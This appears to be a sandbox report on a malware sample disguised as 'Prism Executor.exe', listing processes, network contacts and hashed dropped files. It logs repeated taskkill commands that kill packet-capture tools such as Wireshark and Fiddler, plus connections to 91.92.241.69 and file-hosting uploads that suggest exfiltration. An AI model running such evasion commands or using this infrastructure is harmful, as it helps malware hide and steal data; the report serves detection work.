taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 91.92.241.69:5555 | tcp | |
| US | 8.8.8.8:53 | 69.241.92.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tcp | |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store8.gofile.io | udp |
| US | 206.168.191.31:443 | store8.gofile.io | tcp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.191.168.206.in-addr.arpa | udp |
| US | 8.8.8.8:53 | freeimage.host | udp |
| US | 172.67.204.206:443 | freeimage.host | tcp |
| NL | 91.92.241.69:6060 | 91.92.241.69 | tcp |
| US | 8.8.8.8:53 | 206.204.67.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:52912 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\dllhost.exe
| MD5 | 4a7f75343aaa5a4d8d18add50ccf3139 |
| SHA1 | 110c62eee6d7deb4aa9d601c942eae43482d2125 |
| SHA256 | 34be6a934fd45752e788f9ba20943c8e52d91732d76e9f30a5176e98dccd956e |
| SHA512 | 1f1516fc41e0b90d0d47e306da15a542799425159f4ad476cf4fd88b9b56d200c79c72ce29ca5b0acf2a195cabe803c37c72b8d76e99a69a04dbfe1fb9f9fc79 |
memory/1676-29-0x00007FF9AD7F3000-0x00007FF9AD7F5000-memory.dmp
memory/1676-32-0x0000000000070000-0x000000000008A000-memory.dmp
C:\Users\Admin\Prism Executor.exe
| MD5 | fa819e23d8fee4ea89aaaea55e0b28f5 |
| SHA1 | 18335d4e0d140dcab66c7197c57f669251898ce5 |
| SHA256 | bb4fbbf322982321c56ac48cb7939ef7cb823b510a184c41e284f2cdf1bab68c |
| SHA512 | e6170df5c8705e96a76cb3b366c9410c8f8e5c5dd5753de9be87e47a1c989b4723dd655e3355d52096f7acd3185a5469ed5bf284e7765e9519522ae132cef07d |
memory/2816-46-0x000000007342E000-0x000000007342F000-memory.dmp
memory/2608-50-0x0000000073420000-0x0000000073BD0000-memory.dmp
memory/2608-53-0x0000000002350000-0x0000000002386000-memory.dmp
memory/2816-130-0x00000000050C0000-0x00000000056E8000-memory.dmp
memory/2816-394-0x0000000005020000-0x0000000005042000-memory.dmp
memory/2816-405-0x0000000005920000-0x0000000005986000-memory.dmp
memory/2816-421-0x0000000005990000-0x00000000059F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sinq1l2v.zuz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2608-557-0x0000000005640000-0x0000000005994000-memory.dmp
memory/2608-829-0x0000000005C60000-0x0000000005C7E000-memory.dmp
memory/2608-877-0x0000000005CF0000-0x0000000005D3C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\nexusloader.exe
| MD5 | 58545dc488990ac11872079d119f8284 |
| SHA1 | dade5c16834d582a5187041697cc5a7c2eae2f88 |
| SHA256 | 6669bd79928492ab626c6cc64de35e3da76d655bbd197b5cc644584014fea5bc |
| SHA512 | 93d6e3f6a2ff03b4b58db7c04f8ad00e5c5f95eceefd199b73a8af6009ef381f758825ebe3d0d3076f917299c850b2859fb2ec35eeef59126617d2a0ec54dcd7 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\python310.dll
| MD5 | 384349987b60775d6fc3a6d202c3e1bd |
| SHA1 | 701cb80c55f859ad4a31c53aa744a00d61e467e5 |
| SHA256 | f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8 |
| SHA512 | 6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5 |
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tcl86t.dll
| MD5 | ad03d1e9f0121330694415f901af8f49 |
| SHA1 | ad8d3eee5274fef8bb300e2d1f4a11e27d3940df |
| SHA256 | 224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9 |
| SHA512 | 19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk86t.dll
| MD5 | e3c7ed5f9d601970921523be5e6fce2c |
| SHA1 | a7ee921e126c3c1ae8d0e274a896a33552a4bd40 |
| SHA256 | bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77 |
| SHA512 | bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\init.tcl
| MD5 | e10e428598b2d5f2054cfae4a7029709 |
| SHA1 | f8e7490e977c3c675e76297638238e08c1a5e72e |
| SHA256 | 61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939 |
| SHA512 | 88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\encoding\cp1252.enc
| MD5 | 5900f51fd8b5ff75e65594eb7dd50533 |
| SHA1 | 2e21300e0bc8a847d0423671b08d3c65761ee172 |
| SHA256 | 14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0 |
| SHA512 | ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\_tkinter.pyd
| MD5 | 0f1aa5b9a82b75b607b4ead6bb6b8be6 |
| SHA1 | 5d58fd899018a106d55433ea4fcb22faf96b4b3d |
| SHA256 | 336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190 |
| SHA512 | b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tcl\encoding\symbol.enc
| MD5 | 1b612907f31c11858983af8c009976d6 |
| SHA1 | f0c014b6d67fc0dc1d1bbc5f052f0c8b1c63d8bf |
| SHA256 | 73fd2b5e14309d8c036d334f137b9edf1f7b32dbd45491cf93184818582d0671 |
| SHA512 | 82d4a8f9c63f50e5d77dad979d3a59729cd2a504e7159ae3a908b7d66dc02090dabd79b6a6dc7b998c32c383f804aacabc564a5617085e02204adf0b13b13e5b |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\vistaTheme.tcl
| MD5 | ad2d78020875529834dd0ea74251e2d3 |
| SHA1 | 80cc99972a056396dd55e9505ccb02e16462b115 |
| SHA256 | ce1a53a769de9e230f586efafd2fb455980b45941e5db553bd3a2f0062b50f3e |
| SHA512 | 59ec21a44769fec0b462f0675217882ecf5cbc64056024e4259d91233a1397b4b89957bd474387c992a8753dc9c350fda7e6e5c6e9d29c655d62362a018e2194 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\xpTheme.tcl
| MD5 | 1026799ffe26aaa8661f64d6f2cbe4dd |
| SHA1 | 5cd337feb3130d146134e06c4a1826ba29157e7a |
| SHA256 | ff421674388da5d3a0c687f342f8d1e3c7f247f3cb59d5512b31f91a54a4c318 |
| SHA512 | 90f1062caa87c0d65aede1d71370ebe35ad90f4033e6077169b7168b4754c0ff46a9f6348f4d907dcf20ab8f63bb6e0d106a05f068c5abeb86d26f5ea00f503c |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\winTheme.tcl
| MD5 | 8b4813a1c6915fd35b52ac854230bcc1 |
| SHA1 | db981087f2a311361446014fadbd8b199d856716 |
| SHA256 | 05fad058280e7a8947a9f71122b442b92d7d578b4618b08bf0b71b6dac5aa22f |
| SHA512 | e0a69e94aabd725b441d6c4920f1cd54451bcc00090d9319cb55286a46a7f35066d1959de149d900198f777671004f6d8a64e7d31e42f8a76e89ed122a79a9ff |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\clamTheme.tcl
| MD5 | beced087eeb3d5c9b2eabdb19c030d52 |
| SHA1 | be285e65905d335be442606afa3a88e408d5ec5b |
| SHA256 | 93c29536262c582104bf1804d7b06c7565b7d621f2e3605ff8b6c981a3b4ab01 |
| SHA512 | 84b733c3fbe63c32b5b1e6cd132bd1b55f07b47612b70455c17c4d6d239682672c838cc3d739283079d0d2d8567fca9b763465d8d2148d25b5952282ed521a79 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\altTheme.tcl
| MD5 | ae1b9c4dc2de8e899749fb4e1fcb4df6 |
| SHA1 | 2a09d325ca56c930b3afb1ee43c944fd4416b8e1 |
| SHA256 | 92b8be9d8934850b6d240b970603b0ad7c6dd4a45134545694fb52966d742861 |
| SHA512 | 2803f96729805c90143e0c4c9bf25398bac7d6e4402cb09be354c35566fc3c3bd9522372147c0e956bdbbc2943b9aecb0f5c96b527a26fd790b8fdb5b99efe10 |
C:\Users\Admin\AppData\Local\Temp\onefile_4004_133628985068537469\tk\ttk\classicTheme.tcl
| MD5 | 70f3edfbfd4c16febdd8311290a0effe |
